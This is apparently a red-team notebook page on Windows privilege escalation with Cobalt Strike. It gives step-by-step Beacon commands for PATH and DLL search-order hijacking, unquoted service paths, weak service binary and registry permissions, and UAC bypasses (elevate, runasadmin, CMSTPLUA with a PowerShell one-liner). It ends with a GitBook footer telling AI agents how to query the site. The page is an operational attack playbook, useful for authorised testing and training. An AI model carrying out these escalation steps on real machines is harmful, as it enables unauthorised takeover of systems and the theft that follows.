> For the complete documentation index, see [llms.txt](https://book.ice-wzl.xyz/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://book.ice-wzl.xyz/c2-frameworks/cobalt-strike/privilege-escalation.md). # Privilege Escalation *** ## Check Permissions ``` cacls C:\Path\To\Check\ ``` | Permission | Meaning | | ---------- | ------------------------------ | | F | Full control | | R | Read & execute | | C | Read, write, execute, & delete | | W | Write | *** ## PATH Variable Hijacking The `%PATH%` variable is constructed from two locations: * **User** - `HKEY_CURRENT_USER\Environment` (user can modify) * **Machine** - `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment` (admin only) User processes use Machine + User paths. System processes use only Machine paths. ``` env cacls C:\Python313\Scripts\ ``` If a directory in PATH is writable by standard users, you can place a malicious executable there. *** ## Service Exploits ### Search Order Hijacking Place malicious executable where service will find it first. ``` # Check permissions cacls "C:\Program Files\Bad Windows Service\Service Executable" # Output: NT AUTHORITY\Authenticated Users:(CI)(OI)F # Upload payload cd "C:\Program Files\Bad Windows Service\Service Executable" upload C:\Payloads\dns_x64.exe mv dns_x64.exe cmd.exe ``` ### Unquoted Service Paths Exploit unquoted paths with spaces. ``` # Enumerate services sc_enum # Check permissions on parent directory cacls "C:\Program Files\Bad Windows Service" # Output: NT AUTHORITY\Authenticated Users:(CI)(OI)F # Upload payload with name that matches path parsing cd "C:\Program Files\Bad Windows Service" upload C:\Payloads\dns_x64.svc.exe mv dns_x64.svc.exe Service.exe sc_stop BadWindowsService sc_start BadWindowsService ``` > If you cannot start/stop the service, wait for reboot or trigger one. ### Weak Service Binary Permissions Replace the actual service executable. ``` # Check executable permissions cacls "C:\Program Files\Bad Windows Service\Service Executable\BadWindowsService.exe" # Output: NT AUTHORITY\Authenticated Users:F # Replace executable cd "C:\Program Files\Bad Windows Service\Service Executable\" sc_stop BadWindowsService upload C:\Payloads\BadWindowsService.exe sc_start BadWindowsService ``` ### Weak Service Registry Permissions Modify service configuration via registry. ``` # Check registry permissions powerpick Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\BadWindowsService | fl # Stop service and note current binpath sc_stop BadWindowsService sc_qc BadWindowsService # Upload payload cd C:\Temp upload C:\Payloads\dns_x64.svc.exe # Modify service config (binpath, type=0, start=2) sc_config BadWindowsService C:\Temp\dns_x64.svc.exe 0 2 sc_start BadWindowsService # Restore original binpath after exploitation sc_config BadWindowsService "C:\Program Files\Bad Windows Service\Service Executable\BadWindowsService.exe" 0 2 ``` *** ## DLL Search Order Hijacking Typical DLL search order: 1. The executing directory 2. The System32 directory 3. The 16-bit System directory 4. The Windows directory 5. The current working directory 6. Directories in PATH ``` # Check if service directory is writable cacls "C:\Program Files\Bad Windows Service\Service Executable" # Output: NT AUTHORITY\Authenticated Users:(CI)(OI)F cd "C:\Program Files\Bad Windows Service\Service Executable" upload C:\Payloads\dns_x64.dll mv dns_x64.dll BadDll.dll ``` *** ## UAC Bypass (Medium → High Integrity) > **Prerequisite:** Must be member of local Administrators group Check current integrity: ``` whoami # Look at bottom of output for integrity level ``` ### elevate Command ``` elevate [exploit] [listener] ``` | Exploit | Description | | --------------------- | ------------------------ | | svc-exe | Get SYSTEM via service | | uac-schtasks | Bypass via SilentCleanup | | uac-token-duplication | Token duplication bypass | ### runasadmin Command Execute arbitrary commands with elevation. ``` runasadmin [exploit] [command] [args] ``` | Exploit | Description | | --------------------- | ---------------------- | | uac-cmstplua | CMSTPLUA COM interface | | uac-eventvwr | eventvwr.exe bypass | | uac-schtasks | SilentCleanup bypass | | uac-token-duplication | Token duplication | | uac-wscript | wscript.exe bypass | ### CMSTPLUA UAC Bypass > **Requirement:** Beacon process must be in `C:\Windows\*` 1. Spawn a new Beacon: ``` spawn x64 http ``` 2. Generate PowerShell one-liner: * Right-click Beacon → **Access > One-liner** * Select tcp-local listener 3. Execute bypass: ``` runasadmin uac-cmstplua [ONE-LINER] connect localhost 1337 ``` *** ## Quick Reference | Vulnerability | Detection | Exploitation | | ------------------- | -------------------------------- | ----------------------- | | PATH Hijack | Writable dir in PATH | Place malicious EXE | | Search Order Hijack | Writable service directory | Place malicious DLL/EXE | | Unquoted Path | Space in unquoted service path | Place EXE at path break | | Weak Binary | Writable service executable | Replace EXE | | Weak Registry | Writable service registry key | Modify ImagePath | | DLL Hijack | Writable dir in DLL search order | Place malicious DLL | | UAC Bypass | Medium integrity + local admin | elevate/runasadmin | --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://book.ice-wzl.xyz/c2-frameworks/cobalt-strike/privilege-escalation.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.